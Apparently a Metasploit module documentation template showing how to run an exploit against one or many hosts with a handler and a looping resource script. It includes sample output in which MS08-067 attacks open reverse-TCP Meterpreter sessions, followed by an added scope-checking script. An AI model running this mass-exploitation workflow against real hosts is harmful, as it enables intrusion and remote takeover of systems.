- **Using <%= mod.shortname %> against a single host**
- Normally, you can use <%= mod.fullname %> this way:
- ```
- msf > use <%= mod.fullname %>
- msf <%= mod.type %>(<%= mod.shortname %>) > show targets
- ... a list of targets ...
- msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id
- msf <%= mod.type %>(<%= mod.shortname %>) > show options
- ... show and set options ...
- msf <%= mod.type %>(<%= mod.shortname %>) > exploit
- ```
- **Using <%= mod.shortname %> against multiple hosts**
- But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
- First, create a list of IPs you wish to exploit with this module. One IP per line.
- Second, set up a background payload listener. This payload should be the same as the one your
- <%= mod.shortname %> will be using:
- 1. Do: ```use exploit/multi/handler```
- 2. Do: ```set PAYLOAD [payload]```
- 3. Set other options required by the payload
- 4. Do: ```set EXITONSESSION false```
- 5. Do: ```run -j```
- At this point, you should have a payload listening.
- Next, create the following script. Note that you will probably need to modify the ip_list path and
- the payload options accordingly:
- ```
- <ruby>
- #
- # Modify the path if necessary
- #
- ip_list = '/tmp/ip_list.txt'
- File.open(ip_list, 'rb').each_line do |ip|
- print_status("Trying against #{ip}")
- run_single("use <%= mod.fullname %>")
- run_single("set RHOST #{ip}")
- run_single("set DisablePayloadHandler true")
- #
- # Set a payload that's the same as the handler.
- # You might also need to add more run_single commands to configure other
- # payload options.
- #
- run_single("set PAYLOAD [payload name]")
- run_single("run")
- end
- </ruby>
- ```
- Next, run the resource script in the console:
- ```
- msf > resource [path-to-resource-script]
- ```
- Finally, you should see the exploit run against each of those hosts, similar to the following
- MS08-067 example:
- ```
- msf > resource /tmp/exploit_hosts.rc
- [*] Processing /tmp/exploit_hosts.rc for ERB directives.
- [*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
- [*] Trying against 192.168.1.80
- RHOST => 192.168.1.80
- DisablePayloadHandler => true
- PAYLOAD => windows/meterpreter/reverse_tcp
- LHOST => 192.168.1.199
- [*] 192.168.1.80:445 - Automatically detecting the target...
- [*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
- [*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
- [*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
- [*] Sending stage (957999 bytes) to 192.168.1.80
- [*] Trying against 192.168.1.109
- RHOST => 192.168.1.109
- DisablePayloadHandler => true
- PAYLOAD => windows/meterpreter/reverse_tcp
- LHOST => 192.168.1.199
- [*] 192.168.1.109:445 - Automatically detecting the target...
- [*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
- [*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
- [*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
- [*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
- [*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
- [*] Sending stage (957999 bytes) to 192.168.1.109
- [*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
- ```
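A pre-flight check for the IP list that the resource script reads, as an added example that is not part of the original page or of the Metasploit project: it keeps only single addresses that fall inside an authorized scope and reports everything else. The scope range, the exclusion list, the sample lines and the name `vet_ip_list` are assumptions made for illustration.

```ruby
require 'ipaddr'

# Hypothetical engagement scope (constructed values): only these ranges are authorized.
AUTHORIZED_SCOPE = %w[192.168.1.0/24].map { |cidr| IPAddr.new(cidr) }.freeze
# Hosts inside the scope that the rules of engagement exclude (constructed value).
EXCLUDED_HOSTS = %w[192.168.1.1].map { |ip| IPAddr.new(ip) }.freeze

# Constructed sample of an ip_list file, one entry per line.
SAMPLE_LIST = <<~LIST
  192.168.1.80
  192.168.1.109
  192.168.1.80
  192.168.1.1
  10.0.0.5
  192.168.1.0/24
  fileserver.example
LIST

# Returns [accepted, rejected]. accepted is a de-duplicated array of address
# strings; rejected is an array of [line_number, entry, reason].
def vet_ip_list(text, scope: AUTHORIZED_SCOPE, excluded: EXCLUDED_HOSTS)
  accepted = []
  rejected = []
  text.each_line.with_index(1) do |raw, lineno|
    entry = raw.strip # drops the trailing newline that each_line keeps
    next if entry.empty? || entry.start_with?('#')
    # One address per line: CIDR blocks and hostnames are rejected, not expanded.
    addr = begin
      entry.match?(/\A[0-9a-fA-F.:]+\z/) ? IPAddr.new(entry) : nil
    rescue IPAddr::Error
      nil
    end
    reason =
      if addr.nil? then 'not a single IP address'
      elsif scope.none? { |net| net.include?(addr) } then 'outside authorized scope'
      elsif excluded.include?(addr) then 'explicitly excluded'
      elsif accepted.include?(addr.to_s) then 'duplicate'
      end
    reason ? rejected << [lineno, entry, reason] : accepted << addr.to_s
  end
  [accepted, rejected]
end

accepted, rejected = vet_ip_list(SAMPLE_LIST)
puts "accepted: #{accepted.join(', ')}"
rejected.each { |line, entry, why| puts "line #{line}: #{entry} (#{why})" }
```

Writing only the accepted addresses back to the list file means the loop in the resource script never sees an entry that was not reviewed.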